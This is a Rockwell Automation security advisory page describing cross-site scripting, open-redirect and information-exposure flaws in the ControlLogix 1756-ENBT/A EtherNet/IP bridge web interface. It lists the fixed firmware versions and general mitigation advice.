Loading

PN391 | ControlLogix 1756-ENBT/A Ethernet/IP Bridge - Potential Security Vulnerabilities

Advisory ID:
PN391
게시한 날짜:
February 11, 2020
최근 업데이트:
February 11, 2020
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
아니요
Corrected:
아니요
Workaround:
아니요
요약
ControlLogix 1756-ENBT/A Ethernet/IP Bridge - Potential Security Vulnerabilities

Introduction

Description

Potential Security Vulnerabilities

Rockwell Automation has identified three potential security vulnerabilities related to the web interface of the 1756-ENBT/A EtherNet/IP Bridge Module (the "Product"). Specifically, the risks include the following:

  • The potential for cross-site scripting, which could allow the Product to be used in a social engineering attack.

  • An attacker could potentially craft a URL that looked as if it would take a user to the Product, but would instead execute script from a different location. A successful attack would require the attacker to transmit the crafted URL to a user with access to the web interface of the Product and to convince that user to open the URL.

  • The potential for web redirection, which could allow the Product to be used in a social engineering attack.

  • An attacker could potentially craft a URL that looked as if it would take a user to the Product, but would actually direct the browser to a different location. A successful attack would require the attacker to transmit the crafted URL to a user with access to the web interface of the Product and to convince that user to open the URL.

  • The potential for exposure of some of the Product’s internal web page information. While this does not directly present a functional vulnerability, it does expose some internal information about the module.

Risk Mitigation

None of these issues results in the Product’s web pages or other Product functions being compromised or otherwise affected.

These potential security vulnerabilities are corrected in:

  • 1756-ENBT Version 4.008

  • 1756-EWEB Version 4.009

The best way to mitigate the risk associated with these issues is to employ the following in the design of network architecture:

  • Layered security.

  • Defense-in-depth methods.

Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

Additionally, to help mitigate the risk associated with the cross-site scripting potential vulnerability, certain web browsers and/or browser add-ons can be used. Internet Explorer Version 8 (which is currently in beta release) has cross-site scripting protection built-in. Additionally, the NoScript add-on for the FireFox browser can help prevent cross-site scripting attacks.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security/.

REFERENCES

http://www.kb.cert.org/vuls/id/124059

http://www.kb.cert.org/vuls/id/619499

http://www.kb.cert.org/vuls/id/882619

Industry Advisory - CIP: Rockwell Automation ControlLogix 1756-ENBT/A WebServer Vulnerabilities

KCS Status

Released

Rockwell Automation Home
Copyright ©2022 Rockwell Automation, Inc.
  1. Chevron LeftChevron Left Rockwell Automation 홈
  2. Chevron LeftChevron Left Trust Center
  3. Chevron LeftChevron Left Industrial Security Adv
  4. Chevron LeftChevron Left Industrial Security Advisory Detail
계속 진행하기 위해 쿠키 설정을 업데이트하십시오..
この機能には、お客様の利便性を向上させるためにクッキーが必要です。これらのクッキーを許可するように設定を更新してください:
  • 소셜 미디어 쿠키
  • 기능 쿠키
  • 성능 쿠키
  • 마케팅 쿠키
  • 모든 쿠키
귀하는 쿠키 설정을 언제든지 변경할 수 있습니다. 자세한 내용은 이곳에서 확인하십시오. {0} 개인 정보 보호 정책
CloseClose